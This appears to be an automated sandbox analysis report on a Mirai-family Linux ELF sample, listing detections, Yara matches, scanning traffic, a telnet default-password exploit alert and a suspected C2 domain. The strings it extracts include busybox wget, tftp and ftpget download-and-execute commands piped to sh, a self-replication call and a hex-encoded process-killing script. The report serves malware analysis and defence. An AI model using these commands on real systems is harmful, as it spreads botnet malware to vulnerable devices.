Linux Analysis Report
fwkeLXlthW.elf

Overview

General Information

Sample name: fwkeLXlthW.elf
renamed because original name is a hash value
Original sample name: 4e3269ecb73ec06315bb4649325006c9.elf
Analysis ID: 1432506
MD5: 4e3269ecb73ec06315bb4649325006c9
SHA1: 1f6a25b2282f2acaed2f02b25eb5e3180f2232a9
SHA256: aeeca28a10aed98529173178dacc8533fc21fc22f2f88fd3e5e073c97445f2d8
Tags: 32elfintelmirai
Infos:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

AV Detection

barindex
Source: fwkeLXlthW.elf Virustotal: Detection: 37% Perma Link
Source: fwkeLXlthW.elf ReversingLabs: Detection: 57%
Source: fwkeLXlthW.elf Joe Sandbox ML: detected
Source: fwkeLXlthW.elf String: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: fwkeLXlthW.elf String: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"

Networking

barindex
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:45894 -> 186.132.173.53:23
Source: global traffic TCP traffic: 204.76.203.101 ports 38241,1,2,3,4,8
Source: global traffic TCP traffic: 192.168.2.23:41498 -> 204.76.203.101:38241
Source: global traffic TCP traffic: 192.168.2.23:39258 -> 34.249.145.219:443
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 92.93.39.208
Source: unknown TCP traffic detected without corresponding DNS query: 71.107.107.71
Source: unknown TCP traffic detected without corresponding DNS query: 137.194.217.199
Source: unknown TCP traffic detected without corresponding DNS query: 98.184.114.145
Source: unknown TCP traffic detected without corresponding DNS query: 19.87.118.167
Source: unknown TCP traffic detected without corresponding DNS query: 108.47.38.188
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.77.113
Source: unknown TCP traffic detected without corresponding DNS query: 163.81.71.18
Source: unknown TCP traffic detected without corresponding DNS query: 64.198.117.53
Source: unknown TCP traffic detected without corresponding DNS query: 150.70.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 54.105.186.247
Source: unknown TCP traffic detected without corresponding DNS query: 124.181.78.48
Source: unknown TCP traffic detected without corresponding DNS query: 20.206.175.57
Source: unknown TCP traffic detected without corresponding DNS query: 159.31.215.96
Source: unknown TCP traffic detected without corresponding DNS query: 43.21.228.139
Source: unknown TCP traffic detected without corresponding DNS query: 196.114.218.54
Source: unknown TCP traffic detected without corresponding DNS query: 101.73.117.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.30.205
Source: unknown TCP traffic detected without corresponding DNS query: 191.164.198.26
Source: unknown TCP traffic detected without corresponding DNS query: 114.158.178.175
Source: unknown TCP traffic detected without corresponding DNS query: 187.169.247.130
Source: unknown TCP traffic detected without corresponding DNS query: 141.188.57.73
Source: unknown TCP traffic detected without corresponding DNS query: 146.62.111.231
Source: unknown TCP traffic detected without corresponding DNS query: 7.175.70.7
Source: unknown TCP traffic detected without corresponding DNS query: 137.160.2.214
Source: unknown TCP traffic detected without corresponding DNS query: 79.209.55.108
Source: unknown TCP traffic detected without corresponding DNS query: 68.184.17.218
Source: unknown TCP traffic detected without corresponding DNS query: 196.225.183.108
Source: unknown TCP traffic detected without corresponding DNS query: 93.205.90.8
Source: unknown TCP traffic detected without corresponding DNS query: 27.121.72.117
Source: unknown TCP traffic detected without corresponding DNS query: 135.121.121.215
Source: unknown TCP traffic detected without corresponding DNS query: 52.170.149.210
Source: unknown TCP traffic detected without corresponding DNS query: 173.15.20.241
Source: unknown TCP traffic detected without corresponding DNS query: 69.9.160.58
Source: unknown TCP traffic detected without corresponding DNS query: 99.28.120.35
Source: unknown TCP traffic detected without corresponding DNS query: 190.86.136.254
Source: unknown TCP traffic detected without corresponding DNS query: 62.127.39.150
Source: unknown TCP traffic detected without corresponding DNS query: 142.232.95.3
Source: unknown TCP traffic detected without corresponding DNS query: 217.213.177.132
Source: unknown TCP traffic detected without corresponding DNS query: 202.242.221.153
Source: unknown TCP traffic detected without corresponding DNS query: 92.216.200.124
Source: unknown TCP traffic detected without corresponding DNS query: 174.167.254.173
Source: unknown TCP traffic detected without corresponding DNS query: 55.115.0.227
Source: unknown TCP traffic detected without corresponding DNS query: 90.99.1.180
Source: unknown TCP traffic detected without corresponding DNS query: 124.96.51.1
Source: unknown TCP traffic detected without corresponding DNS query: 180.233.125.176
Source: unknown TCP traffic detected without corresponding DNS query: 178.205.122.115
Source: unknown TCP traffic detected without corresponding DNS query: 169.117.211.104
Source: unknown TCP traffic detected without corresponding DNS query: 145.132.104.81
Source: unknown TCP traffic detected without corresponding DNS query: 68.20.243.120
Source: global traffic DNS traffic detected: DNS query: netfags.geek
Source: fwkeLXlthW.elf String found in binary or memory: http:///curl.sh
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39258 -> 443

System Summary

barindex
Source: fwkeLXlthW.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: fwkeLXlthW.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: fwkeLXlthW.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: fwkeLXlthW.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x
Source: ELF static info symbol of initial sample .symtab present: no
Source: fwkeLXlthW.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: fwkeLXlthW.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: fwkeLXlthW.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: fwkeLXlthW.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: classification engine Classification label: mal72.troj.linELF@0/0@1/0
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/4331/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2033/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1582/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2275/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1612/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1579/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1699/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1335/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1698/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2028/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1334/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1576/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2302/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/3236/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2025/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2146/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/912/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/759/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2307/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/918/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/6087/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/6241/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1594/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2285/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2281/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1349/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1623/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/761/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1622/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/884/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1983/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2038/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1586/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1465/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1344/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1860/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1463/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2156/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/800/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/801/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1629/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/6239/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1627/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1900/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/491/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2294/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2050/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1877/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/772/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1633/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1599/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1632/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1477/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/774/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1476/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1872/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2048/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1475/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2289/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/777/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/658/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/936/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1639/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1638/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2208/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2180/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1809/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1494/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1890/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2063/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2062/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1888/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1886/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1489/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/785/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1642/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/788/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/789/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1648/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2078/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2077/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2074/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2195/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/793/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1656/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1654/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2226/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1532/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/796/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/797/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2069/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2102/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2223/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/799/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2080/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2242/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2084/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2083/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1668/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1664/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/1389/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/720/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2114/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/2235/status Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256) File opened: /proc/721/status Jump to behavior
Source: /usr/bin/dash (PID: 6307) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.fFD4gfLXFO /tmp/tmp.QPFGv5zNHi /tmp/tmp.4V1i9LBHGg Jump to behavior
Source: /usr/bin/dash (PID: 6308) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.fFD4gfLXFO /tmp/tmp.QPFGv5zNHi /tmp/tmp.4V1i9LBHGg Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs